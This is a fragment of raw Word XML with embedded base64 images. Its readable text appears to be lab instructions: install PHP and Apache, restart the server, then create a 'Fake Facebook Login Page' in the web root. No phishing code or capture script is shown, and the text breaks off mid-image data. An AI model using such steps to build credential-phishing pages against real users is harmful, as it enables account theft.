AAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;">
                  <v:imagedata r:id="rId11" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 9" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:39923;height:9576;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3992245,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VwUxAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gQvpW5SSrHRVVQISC5iFNrjI/tMgtm3IbtN0v76rlDwOMzMN8xqM5pG9NS52rKCeB6B&#10;IC6srrlUcDmnLwsQziNrbCyTgh9ysFlPnlaYaDvwifrclyJA2CWooPK+TaR0RUUG3dy2xMG72s6g&#10;D7Irpe5wCHDTyNcoepcGaw4LFba0r6i45d9Gwf4rO57SuHg2epfh7jM/x/7tV6nZdNwuQXga/SP8&#10;3z5oBR9wvxJugFz/AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL21XBTEAAAA2gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,957452r3992245,l3992245,,,,,957452xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>libapache2-mod-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B597583" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="561"/>
        </w:tabs>
        <w:spacing w:before="24"/>
        <w:ind w:left="360" w:right="5861" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDF54F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="560"/>
        </w:tabs>
        <w:ind w:left="360" w:right="6109" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Page cd /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8C5EB" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DA9B3" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="6"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487589376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25069547" wp14:editId="08999B0A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>904239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>64514</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2986405" cy="206121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6405" cy="2061210"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2986405" cy="2061210"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="11" name="Image 11"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9525"/>
                            <a:ext cx="2967355" cy="2042160"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="12" name="Graphic 12"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="2976880" cy="2051685"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2976880" h="2051685">
                                <a:moveTo>
                                  <a:pt x="0" y="2051685"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2976880" y="2051685"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2976880" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="205168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4A1EE4" id="Group 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:71.2pt;margin-top:5.1pt;width:235.15pt;height:162.3pt;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="29864,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0siBoAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWXY/TOhB9R+I/&#10;WHln04ZttxttF12xsFoJwQoW3WfXcRILxza2+7H/nhl/pKHlCi6Vmozr8fj4zJlxb94cBkl23Dqh&#10;1bqYX8wKwhXTjVDduvj69P7VqiDOU9VQqRVfF8/cFW9uX7642ZuaV7rXsuGWQBDl6r1ZF733pi5L&#10;x3o+UHehDVcw2Wo7UA9D25WNpXuIPsiyms2W5V7bxljNuHPw612cLG5D/LblzH9qW8c9kesCsPnw&#10;tOG5wWd5e0PrzlLTC5Zg0L9AMVChYNMx1B31lGytOAs1CGa1062/YHooddsKxsMZ4DTz2clp7q3e&#10;mnCWrt53ZqQJqD3h6a/Dso+7e2u+mEcb0YP5QbNvDngp96arp/M47o7Oh9YOuAgOQQ6B0eeRUX7w&#10;hMGP1fVqeTlbFITBXDVbzqt54pz1kJizdax/95uVJa3jxgHeCMcIVsM3UQTWGUW/lxKs8lvLixRk&#10;+KMYA7XftuYVZNNQLzZCCv8clAl5Q1Bq9ygYsosDYPPREtFApcwLougAFfEw0I4TGAPl2QdXYAbO&#10;AmykMO+FlMg72gkqCPpEEL84bRTbnWbbgSsfq8dyCai1cr0wriC25sOGAzz70ABABpXrAaKxQvlY&#10;Ks5b7lmP+7eA4zMUGAKl9TgRQB9x4hFckteJYq4XFSgDhBEMCEPro26WV68Xo24uq/ky6GbMPq2N&#10;df6e64GgAYgBCVBOa7r74BKm7JKYjDACPkCFLQJ6jsscwuiMxf9VVl96ajhAwLCTRFc50fepy8wr&#10;pDJ5YeWl0X+wdHm1hBDAUjBOWLparlbQ1mJ1LebL1QJjT1hi28jSlBnoUk3kCNjqs8UOKpvIJTZM&#10;GRqmB10AvwWBhrmJKgCp4zoMiibZY6UnLD0WeoSC84Pe8ScdPP2x3LNHBHv0kWrqO8YMzWN6vOyX&#10;3ybEnvpnuWSP/I6ewBnE/BOfn5HmKExqxyN4JCBQPpIC9E9plwr5CRpHGpyWosk17Gy3eSst2VG8&#10;n8InJfAnNxTyHXV99AtTyU0q2Bu1FNWD1kY3z9Bl9iC3deG+bym2NPmgQN54A2bDZmOTDevlWx3u&#10;yZAu2PPp8C+1JlWYh+L8qLPKzwot+uJKpf/Zet2KUIVHRAkoVFywwpUWiEvXL96Z03HwOv5JuP0B&#10;AAD//wMAUEsDBAoAAAAAAAAAIQDfCuIoL+wAAC/sAAAVAAAAZHJzL21lZGlhL2ltYWdlMS5qcGVn&#10;/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsK&#10;CwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAG+Ao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Cs/+&#10;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